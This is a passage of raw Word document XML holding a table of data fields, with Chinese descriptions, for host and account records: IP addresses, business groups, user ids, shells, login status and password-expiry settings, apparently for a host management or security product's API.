          </w:tcPr>
          <w:p w14:paraId="2A9937C9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>显示IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0CE2B453" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F39E1DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A9AD845" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="416781A5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AE561B8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1AC3F67F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="702C9DE1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AB1B6BF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EBCC0E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A4095E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="14024F16" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AD41A82" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6609EC27" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25B588FC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4054E5D7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4FCFFDE3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37A0BAA3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C24C92C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A465B2D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18249E0C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1FDA7CD2" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="794BCAE6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BB3C6CC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6ADE7A04" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73FBD9AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="68C080DB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BF335F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C6A2EFA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70991C63" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CE2ED90" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3CCDC40B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C1C3FB4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22C4B6AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FA10654" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F7CAB8C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1F99CD4D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CE6BDF3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B11F8F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B889522" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41CE3A27" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="578C4B41" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A65C25C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>uid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CDE36E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53EC78C8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31E27416" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>账号uid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="13D1B26C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C2FDF98" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>gid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13A1A20A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AD2089D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26A1449B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户组id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5FD3A714" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EB690FA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CE4CC6A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2082F99E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BAEE6A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>账户组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7D340DB7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55BD8142" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62149665" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4ADA7D3A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B03006C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>账号名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="03E083CC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50FF278E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="679D5903" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A6CAD8C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="564A8516" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>账号状态 linux 账号状态，1:启用，0:禁用 ；windows 账号状态，0:启用，1：锁定，2:禁用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="12527AF6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="572CE4AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>home</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="704DAA32" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E8728D6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52369081" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>home目录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="18DF9C83" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0143D788" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22B03DAC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E3AAAFA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BBE26B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>用户shell，仅linux可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5EBB1585" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55840E41" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>loginStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4623A416" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="605ABCFA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1410AC9F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>登录状态，0不可登入 1不可交互登入 2可交互登入，3 key&amp;pwd登陆 ，仅linux可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="18CC85BA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A356D47" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>lastLoginTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EAE0E16" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="765F6543" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44BCC489" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>最后登录时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="56400827" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7932EEC2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pwdMaxDays</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31FE7F8A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B6F9CBD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53DCBCB3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>密码到期天数， null为不限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="56001D55" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="718593EF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pwdMinDays</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C893AE0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27A47161" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A9E4D15" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>密码多少天后可修改，nul为不限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="73E5B210" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D7225A3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>pwdWarnDays</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F1ABD4C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FDCF9B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B645A37" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>密码到期告警天数，null为不限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="44B57B48" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
